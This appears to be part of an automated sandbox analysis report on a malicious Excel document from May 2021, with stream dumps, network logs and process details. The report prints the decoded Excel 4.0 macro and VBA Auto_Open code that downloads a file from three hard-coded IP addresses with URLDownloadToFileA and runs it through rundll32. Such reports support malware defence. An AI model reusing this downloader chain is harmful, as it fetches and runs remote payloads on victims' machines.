                                                                                                                                                Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                                                                                                                                                Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                                                                Stream Path: VBA/dir, File Type: data, Stream Size: 1024
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/dir
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:1024
                                                                                                                                                Entropy:6.73319737871
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . b . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                                                                                                                                                Data Raw:01 fc b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 be 20 84 62 0e 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                                                                                                                Macro 4.0 Code

                                                                                                                                                ,,"=CONCATENATE(AG80,AH78,AG78,AG79)",,,,,,"=CONCATENATE(AG81,AH78,AG78,AG79)",,1,,,,"=CONCATENATE(AG82,AH78,AG78,AG79)",,9,,,,,,,"=ON.TIME(NOW()+""00:00:02"",""Grestes"")",,,.d,=NOW(),,,,,at,"=FORMULA(AG85&AG86&AG92,AI83)",,,,,"=""http://185.183.99.115/""",,,=HALT(),,,"=""http://51.89.73.159/""",,,,,,"=""http://190.14.37.38/""",,uRlMon,,,,,,,,,,,,JJCCBB,,,,"=""URLDo""",,Belandes,,,,"=""wnloadT""",,,,,,,=GOTO(Blodas!G6),,,,,,,..\Ladfge.VDGfwr,,,,,,,,,,,,,,,,,,,,,,"=""oFileA""",,,,
                                                                                                                                                "=REGISTER(Nyukasl!AI82,Nyukasl!AI83,Nyukasl!AI84,Nyukasl!AI85,,Nyukasl!AI75,9)""=Belandes(0,Nyukasl!AG74,Nyukasl!AI88,0,0)""=IF(G12<0, Belandes(0,Nyukasl!AG75,Nyukasl!AI88,0,0))""=IF(G13<0, Belandes(0,Nyukasl!AG76,Nyukasl!AI88,0,0))""=IF(G14<0,CLOSE(0),)"=GOTO(Jioka!H4)
                                                                                                                                                ,"=""rund""",,"=""ll32 ..\Ladfge.VDGfwr,DllReg""","=""isterServer""",,,,,=PI()=EXEC(I7&I9&I10)=PI(),,,,=HALT(),

                                                                                                                                                Network Behavior

                                                                                                                                                Snort IDS Alerts

                                                                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                05/04/21-19:07:41.801264TCP1201ATTACK-RESPONSES 403 Forbidden8049167185.183.99.115192.168.2.22
                                                                                                                                                05/04/21-19:07:42.059316TCP1201ATTACK-RESPONSES 403 Forbidden804916851.89.73.159192.168.2.22
                                                                                                                                                05/04/21-19:07:43.241894TCP1201ATTACK-RESPONSES 403 Forbidden8049169190.14.37.38192.168.2.22

                                                                                                                                                Network Port Distribution

                                                                                                                                                TCP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                May 4, 2021 19:16:15.554132938 CEST4971880192.168.2.3185.183.99.115
                                                                                                                                                May 4, 2021 19:16:15.622983932 CEST8049718185.183.99.115192.168.2.3
                                                                                                                                                May 4, 2021 19:16:15.623096943 CEST4971880192.168.2.3185.183.99.115
                                                                                                                                                May 4, 2021 19:16:15.623878956 CEST4971880192.168.2.3185.183.99.115
                                                                                                                                                May 4, 2021 19:16:15.692529917 CEST8049718185.183.99.115192.168.2.3
                                                                                                                                                May 4, 2021 19:16:15.891493082 CEST8049718185.183.99.115192.168.2.3
                                                                                                                                                May 4, 2021 19:16:15.891654015 CEST4971880192.168.2.3185.183.99.115
                                                                                                                                                May 4, 2021 19:16:15.899362087 CEST4971980192.168.2.351.89.73.159
                                                                                                                                                May 4, 2021 19:16:15.942394018 CEST804971951.89.73.159192.168.2.3
                                                                                                                                                May 4, 2021 19:16:15.942538023 CEST4971980192.168.2.351.89.73.159
                                                                                                                                                May 4, 2021 19:16:15.943131924 CEST4971980192.168.2.351.89.73.159
                                                                                                                                                May 4, 2021 19:16:15.986170053 CEST804971951.89.73.159192.168.2.3
                                                                                                                                                May 4, 2021 19:16:16.118751049 CEST804971951.89.73.159192.168.2.3
                                                                                                                                                May 4, 2021 19:16:16.119505882 CEST4971980192.168.2.351.89.73.159
                                                                                                                                                May 4, 2021 19:16:16.131661892 CEST4972180192.168.2.3190.14.37.38
                                                                                                                                                May 4, 2021 19:16:16.347027063 CEST8049721190.14.37.38192.168.2.3
                                                                                                                                                May 4, 2021 19:16:16.347218037 CEST4972180192.168.2.3190.14.37.38
                                                                                                                                                May 4, 2021 19:16:16.392647982 CEST4972180192.168.2.3190.14.37.38
                                                                                                                                                May 4, 2021 19:16:16.608597040 CEST8049721190.14.37.38192.168.2.3
                                                                                                                                                May 4, 2021 19:16:17.242520094 CEST8049721190.14.37.38192.168.2.3
                                                                                                                                                May 4, 2021 19:16:17.242721081 CEST4972180192.168.2.3190.14.37.38
                                                                                                                                                May 4, 2021 19:17:20.891457081 CEST8049718185.183.99.115192.168.2.3
                                                                                                                                                May 4, 2021 19:17:20.891556025 CEST4971880192.168.2.3185.183.99.115
                                                                                                                                                May 4, 2021 19:17:21.120646000 CEST804971951.89.73.159192.168.2.3
                                                                                                                                                May 4, 2021 19:17:21.120784044 CEST4971980192.168.2.351.89.73.159
                                                                                                                                                May 4, 2021 19:17:22.243406057 CEST8049721190.14.37.38192.168.2.3
                                                                                                                                                May 4, 2021 19:17:22.243510962 CEST4972180192.168.2.3190.14.37.38
                                                                                                                                                May 4, 2021 19:17:55.149754047 CEST4972180192.168.2.3190.14.37.38
                                                                                                                                                May 4, 2021 19:17:55.150881052 CEST4971980192.168.2.351.89.73.159
                                                                                                                                                May 4, 2021 19:17:55.151318073 CEST4971880192.168.2.3185.183.99.115
                                                                                                                                                May 4, 2021 19:17:55.198422909 CEST804971951.89.73.159192.168.2.3
                                                                                                                                                May 4, 2021 19:17:55.219871998 CEST8049718185.183.99.115192.168.2.3
                                                                                                                                                May 4, 2021 19:17:55.355443954 CEST8049721190.14.37.38192.168.2.3

                                                                                                                                                UDP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                May 4, 2021 19:15:51.934272051 CEST6015253192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:15:51.982973099 CEST53601528.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:15:53.063707113 CEST5754453192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:15:53.112313986 CEST53575448.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:15:53.176804066 CEST5598453192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:15:53.235790968 CEST53559848.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:15:54.307302952 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:15:54.358922958 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:15:55.568938017 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:15:55.617638111 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:15:56.694853067 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:15:56.743637085 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:15:58.049340963 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:15:58.098414898 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:16:04.118915081 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:16:04.167423010 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:16:05.248944998 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:16:05.313146114 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:16:05.769292116 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:16:05.828942060 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:16:06.780545950 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:16:06.924063921 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:16:07.441859007 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:16:07.493766069 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:16:07.796130896 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:16:07.853513956 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:16:08.912045002 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:16:08.960794926 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:16:09.796406031 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:16:09.853488922 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:16:10.818454981 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:16:10.870151043 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:16:13.382998943 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:16:13.434859037 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:16:13.812894106 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:16:13.861574888 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:16:16.063263893 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:16:16.112044096 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:16:19.542145967 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:16:19.591221094 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:16:21.390675068 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:16:21.439693928 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:16:22.321969032 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:16:22.372649908 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:16:23.209453106 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:16:23.258133888 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:16:24.233088970 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:16:24.281788111 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:16:24.592925072 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:16:24.680562973 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:16:25.326855898 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:16:25.378506899 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:16:29.000226021 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:16:29.048978090 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:16:36.594240904 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:16:36.659069061 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:16:47.753575087 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:16:47.805176020 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:17:07.289597988 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:17:07.338356972 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:17:11.463778019 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:17:11.522720098 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:17:30.145167112 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:17:30.202497959 CEST53606338.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:17:45.067238092 CEST6129253192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:17:45.118760109 CEST53612928.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:17:46.952163935 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:17:47.001286030 CEST53636198.8.8.8192.168.2.3

                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                • 185.183.99.115
                                                                                                                                                • 51.89.73.159
                                                                                                                                                • 190.14.37.38

                                                                                                                                                HTTP Packets

                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                0192.168.2.349718185.183.99.11580C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                May 4, 2021 19:16:15.623878956 CEST1277OUTGET /44313,6048108796.dat HTTP/1.1
                                                                                                                                                Accept: */*
                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                Host: 185.183.99.115
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                May 4, 2021 19:16:15.891493082 CEST1278INHTTP/1.1 403 Forbidden
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Tue, 04 May 2021 17:16:18 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 548
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                1192.168.2.34971951.89.73.15980C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                May 4, 2021 19:16:15.943131924 CEST1278OUTGET /44313,6048108796.dat HTTP/1.1
                                                                                                                                                Accept: */*
                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                Host: 51.89.73.159
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                May 4, 2021 19:16:16.118751049 CEST1279INHTTP/1.1 403 Forbidden
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Tue, 04 May 2021 17:12:46 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 548
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                2192.168.2.349721190.14.37.3880C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                May 4, 2021 19:16:16.392647982 CEST1280OUTGET /44313,6048108796.dat HTTP/1.1
                                                                                                                                                Accept: */*
                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                Host: 190.14.37.38
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                May 4, 2021 19:16:17.242520094 CEST1285INHTTP/1.1 403 Forbidden
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Tue, 04 May 2021 17:16:17 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 548
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                Code Manipulations

                                                                                                                                                Statistics

                                                                                                                                                CPU Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                Memory Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                System Behavior

                                                                                                                                                General

                                                                                                                                                Start time:19:16:03
                                                                                                                                                Start date:04/05/2021
                                                                                                                                                Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                Imagebase:0xb70000
                                                                                                                                                File size:27110184 bytes
                                                                                                                                                MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Disassembly

                                                                                                                                                Call Graph

                                                                                                                                                Graph

                                                                                                                                                • Entrypoint
                                                                                                                                                • Decryption Function
                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                • Show Help
                                                                                                                                                callgraph 2 Auto_Open Run:3,Range:3

                                                                                                                                                Module: Blasr

                                                                                                                                                Declaration
                                                                                                                                                LineContent
                                                                                                                                                1

                                                                                                                                                Attribute VB_Name = "Blasr"

                                                                                                                                                Executed Functions
                                                                                                                                                APIsMeta Information

                                                                                                                                                Run

                                                                                                                                                Microsoft Excel:Application.Run()

                                                                                                                                                Range

                                                                                                                                                Run

                                                                                                                                                Range

                                                                                                                                                Run

                                                                                                                                                Range

                                                                                                                                                StringsDecrypted Strings
                                                                                                                                                "AJ6"
                                                                                                                                                "Nyukasl"
                                                                                                                                                "A5"
                                                                                                                                                "Nyukasl"
                                                                                                                                                "A5"
                                                                                                                                                "Nyukasl"
                                                                                                                                                LineInstructionMeta Information
                                                                                                                                                2

                                                                                                                                                Private Sub Auto_Open()

                                                                                                                                                3

                                                                                                                                                Application.Run Sheets("Nyukasl").Range("AJ6")

                                                                                                                                                Microsoft Excel:Application.Run()

                                                                                                                                                Range

                                                                                                                                                executed
                                                                                                                                                5

                                                                                                                                                Application.Run Sheets("Nyukasl").Range("A5")

                                                                                                                                                Run

                                                                                                                                                Range

                                                                                                                                                6

                                                                                                                                                Application.Run Sheets("Nyukasl").Range("A5")

                                                                                                                                                Run

                                                                                                                                                Range

                                                                                                                                                13

                                                                                                                                                End Sub

                                                                                                                                                Module: Briks

                                                                                                                                                Declaration
                                                                                                                                                LineContent
                                                                                                                                                1

                                                                                                                                                Attribute VB_Name = "Briks"

                                                                                                                                                2

                                                                                                                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                                3

                                                                                                                                                Attribute VB_GlobalNameSpace = False

                                                                                                                                                4

                                                                                                                                                Attribute VB_Creatable = False

                                                                                                                                                5

